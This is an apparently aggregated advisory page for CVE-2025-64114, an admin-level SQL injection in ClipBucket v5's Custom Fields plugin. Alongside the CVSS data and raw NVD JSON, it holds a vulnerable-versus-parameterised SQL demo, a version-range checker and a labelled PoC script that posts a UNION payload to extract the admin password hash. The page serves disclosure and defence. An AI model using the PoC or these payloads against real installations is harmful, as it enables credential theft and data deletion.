Security Vulnerability Report
CVE-2025-64114 CVSS 6.5 MEDIUM

CVE-2025-64114

Published: 2025-11-06 00:15:38
Last Modified: 2025-11-10 17:26:25

Description

ClipBucket v5 is an open source video sharing platform. Versions 5.5.2 - #151 and below allow authenticated administrators with plugin management privileges to execute arbitrary SQL commands against the database through its ClipBucket Custom Fields plugin. The vulnerabilities require the Custom Fields plugin to be installed and accessible, and can only be exploited by users with administrative access to the plugin interface. This issue is fixed in version 5.5.2 - #.
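What "execute arbitrary SQL commands" through a plugin form means in practice, as an added example that is neither ClipBucket's code nor the vendor's fix: a custom-field lookup and delete written with string concatenation (the CWE-89 pattern the record assigns) beside the same operations written with bound parameters, run against a constructed in-memory SQLite database. The cb_users / cb_custom_fields table and column names are assumptions borrowed from the PoC further down this page, not the real schema; the UNION payload is the one that PoC uses, and the tautology payload illustrates the integrity half (I:H) of the CVSS vector.

```python
import sqlite3
from typing import List

# Constructed in-memory schema for the demonstration. The table and column
# names (cb_users, cb_custom_fields, userid, password, field_name) are
# assumptions borrowed from the PoC on this page, not ClipBucket's real schema.
SCHEMA = """
CREATE TABLE cb_users (userid INTEGER PRIMARY KEY, username TEXT, password TEXT);
CREATE TABLE cb_custom_fields (id INTEGER PRIMARY KEY, field_name TEXT, field_type TEXT);
INSERT INTO cb_users VALUES (1, 'admin', '$2y$10$constructed.hash.for.the.demo');
INSERT INTO cb_custom_fields VALUES (1, 'genre', 'text');
INSERT INTO cb_custom_fields VALUES (2, 'rating', 'number');
"""

# The payload used by the PoC on this page: closes the string literal, UNIONs in
# a second SELECT, and comments out the trailing quote.
UNION_PAYLOAD = "' UNION SELECT password FROM cb_users WHERE userid=1--"
# A tautology payload for the write path (the I:H half of the CVSS vector).
TAUTOLOGY_PAYLOAD = "' OR 1=1--"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_field_vulnerable(conn: sqlite3.Connection, field_name: str) -> List[str]:
    """CWE-89 pattern: the admin-supplied name is spliced into the SQL text."""
    sql = "SELECT field_name FROM cb_custom_fields WHERE field_name = '" + field_name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_field_safe(conn: sqlite3.Connection, field_name: str) -> List[str]:
    """Same lookup with a bound parameter: the name can only ever be a string value."""
    sql = "SELECT field_name FROM cb_custom_fields WHERE field_name = ?"
    return [row[0] for row in conn.execute(sql, (field_name,))]


def delete_field_vulnerable(conn: sqlite3.Connection, field_name: str) -> int:
    """Concatenated DELETE; returns the number of rows removed."""
    sql = "DELETE FROM cb_custom_fields WHERE field_name = '" + field_name + "'"
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def delete_field_safe(conn: sqlite3.Connection, field_name: str) -> int:
    """Parameterised DELETE; the payload is matched literally and removes nothing."""
    cur = conn.execute("DELETE FROM cb_custom_fields WHERE field_name = ?", (field_name,))
    conn.commit()
    return cur.rowcount


def demo() -> dict:
    """Run every combination on a fresh database and return the observed results."""
    results = {}
    conn = make_db()
    results["vuln_lookup"] = lookup_field_vulnerable(conn, UNION_PAYLOAD)      # leaks the hash
    results["safe_lookup"] = lookup_field_safe(conn, UNION_PAYLOAD)            # nothing matches
    results["safe_delete"] = delete_field_safe(conn, TAUTOLOGY_PAYLOAD)        # 0 rows removed
    results["vuln_delete"] = delete_field_vulnerable(conn, TAUTOLOGY_PAYLOAD)  # every row removed
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The concatenated lookup returns the admin's password hash for the UNION payload and the concatenated delete wipes the whole table for the tautology; the bound-parameter versions treat both payloads as ordinary strings. Administrative privilege does not reduce the impact here: the database user behind the application can usually read and write far more than the plugin interface exposes, which is why the record still rates confidentiality and integrity HIGH despite PR:H.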

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:oxygenz:clipbucket:*:*:*:*:*:*:*:* - VULNERABLE
ClipBucket v5.5.2 - #151 and below (CPE match range: from 5.3 inclusive up to, but not including, 5.5.2-152)
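A check an operator can run against the version string a ClipBucket install reports, as an added example (not part of the NVD record or of the project): it parses the project's "5.5.2 - #151" / "5.5.2-152" version-plus-build format and tests it against the CPE range from the raw JSON on this page (versionStartIncluding 5.3, versionEndExcluding 5.5.2-152). The accepted format is assumed from the version strings that appear on this page; how the string is obtained from a given install is left to the operator.

```python
import re
from typing import Optional, Tuple

# Affected range from the CPE match in the NVD record on this page:
# versionStartIncluding 5.3, versionEndExcluding 5.5.2-152.
VERSION_START_INCLUDING = "5.3"
VERSION_END_EXCLUDING = "5.5.2-152"

# Accepts "5.3", "5.5.2-152", "5.5.2 - #151" and "5.5.2 - #" (build missing).
# Format assumed from the version strings that appear on this page.
_VERSION_RE = re.compile(r"^\s*v?(\d+(?:\.\d+)*)\s*(?:-\s*#?\s*(\d+)?)?\s*$")


def parse_version(text: str) -> Tuple[Tuple[int, ...], Optional[int]]:
    """Split a ClipBucket version string into (numeric parts, build number or None)."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised ClipBucket version string: {text!r}")
    parts = tuple(int(p) for p in m.group(1).split("."))
    build = int(m.group(2)) if m.group(2) is not None else None
    return parts, build


def _pad(parts: Tuple[int, ...], width: int) -> Tuple[int, ...]:
    """Right-pad with zeros so 5.3 compares as 5.3.0 against 5.5.2."""
    return parts + (0,) * (width - len(parts))


def is_affected(version: str) -> Optional[bool]:
    """True if inside the affected range, False if outside, None if the build
    number is needed to decide but is missing (e.g. "5.5.2 - #")."""
    v_parts, v_build = parse_version(version)
    lo_parts, _ = parse_version(VERSION_START_INCLUDING)
    hi_parts, hi_build = parse_version(VERSION_END_EXCLUDING)
    width = max(len(v_parts), len(lo_parts), len(hi_parts))
    v, lo, hi = _pad(v_parts, width), _pad(lo_parts, width), _pad(hi_parts, width)
    if v < lo or v > hi:
        return False
    if v < hi:
        return True  # the numeric part alone places it inside the range
    # Same numeric version as the fix (5.5.2): only the build number decides.
    if v_build is None:
        return None
    return v_build < (hi_build or 0)


if __name__ == "__main__":
    for sample in ["5.5.2 - #151", "5.5.2-152", "5.5.2 - #", "5.4.0", "5.2.9"]:
        print(f"{sample:14} affected={is_affected(sample)}")
```

The three-valued result matters for the boundary case: a 5.5.2 install that does not expose its build number cannot be classified from the numeric version alone, so the function returns None rather than guessing either way.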

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64114 ClipBucket Custom Fields SQL Injection PoC
# Requirements: Authenticated admin access with plugin management privileges
# Target: ClipBucket v5 with Custom Fields plugin installed
#
# NOTE: the admin endpoint, form field names and the cb_users table used below
# are the PoC author's assumptions; they are not confirmed by the advisory text
# reproduced on this page. Verify them against the vendor advisory
# (GHSA-4g7x-j562-8g69) before relying on this script in an authorized test.
import sys

import requests

ADMIN_PATH = "/admin/plugin.php"
LOGIN_PATH = "/login.php"


def login(session, target_url, username, password):
    """Authenticate as admin user.

    The success check is a loose heuristic: any HTTP 200 is accepted, so a
    login page re-rendered with an error also counts as success.
    """
    login_data = {
        "username": username,
        "password": password,
        "submit": "Login",
    }
    response = session.post(f"{target_url}{LOGIN_PATH}", data=login_data, allow_redirects=True)
    return "logged_in" in response.text or response.status_code == 200


def exploit_sql_injection(session, target_url):
    """SQL Injection via Custom Fields plugin parameter.

    Sends the 'field_name' parameter with a malicious SQL payload
    (the same idea applies to 'field_value').
    """
    # Malicious SQL payload - extract admin password hash
    sql_payload = "' UNION SELECT password FROM cb_users WHERE userid=1--"
    exploit_data = {
        "plugin": "custom_fields",
        "action": "save_field",
        "field_name": sql_payload,
        "field_type": "text",
        "submit": "Save",
    }
    response = session.post(
        f"{target_url}{ADMIN_PATH}",
        data=exploit_data,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    return response


def main():
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <admin_user> <admin_pass>")
        sys.exit(1)
    # The target URL from the command line is used throughout (the original
    # script read it but kept posting to a hard-coded host).
    target = sys.argv[1].rstrip("/")
    username = sys.argv[2]
    password = sys.argv[3]

    session = requests.Session()
    print(f"[*] Logging in as {username}...")
    if not login(session, target, username, password):
        print("[-] Authentication failed")
        sys.exit(1)
    print("[+] Authentication successful")

    print("[*] Exploiting SQL injection in Custom Fields plugin...")
    response = exploit_sql_injection(session, target)
    if response.status_code == 200:
        print("[+] Exploit sent - check response for data extraction")
    else:
        print(f"[-] Exploit failed with status code: {response.status_code}")


if __name__ == "__main__":
    main()

References

https://github.com/MacWarrior/clipbucket-v5/commit/b7289923177fe533ae908654ee3cd65b63ffb008 (Patch)
https://github.com/MacWarrior/clipbucket-v5/releases/tag/5.5.2-%23152 (Release Notes)
https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-4g7x-j562-8g69 (Exploit, Vendor Advisory)

Weakness: CWE-89 (SQL Injection)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64114", "sourceIdentifier": "[email protected]", "published": "2025-11-06T00:15:37.980", "lastModified": "2025-11-10T17:26:24.800", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ClipBucket v5 is an open source video sharing platform. Versions 5.5.2 - #151 and below allow authenticated administrators with plugin management privileges to execute arbitrary SQL commands against the database through its ClipBucket Custom Fields plugin. The vulnerabilities require the Custom Fields plugin to be installed and accessible, and can only be exploited by users with administrative access to the plugin interface. This issue is fixed in version 5.5.2 - #."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oxygenz:clipbucket:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3", 
"versionEndExcluding": "5.5.2-152", "matchCriteriaId": "EDA8A1DA-F10C-482F-904C-3519CE1D4198"}]}]}], "references": [{"url": "https://github.com/MacWarrior/clipbucket-v5/commit/b7289923177fe533ae908654ee3cd65b63ffb008", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MacWarrior/clipbucket-v5/releases/tag/5.5.2-%23152", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-4g7x-j562-8g69", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}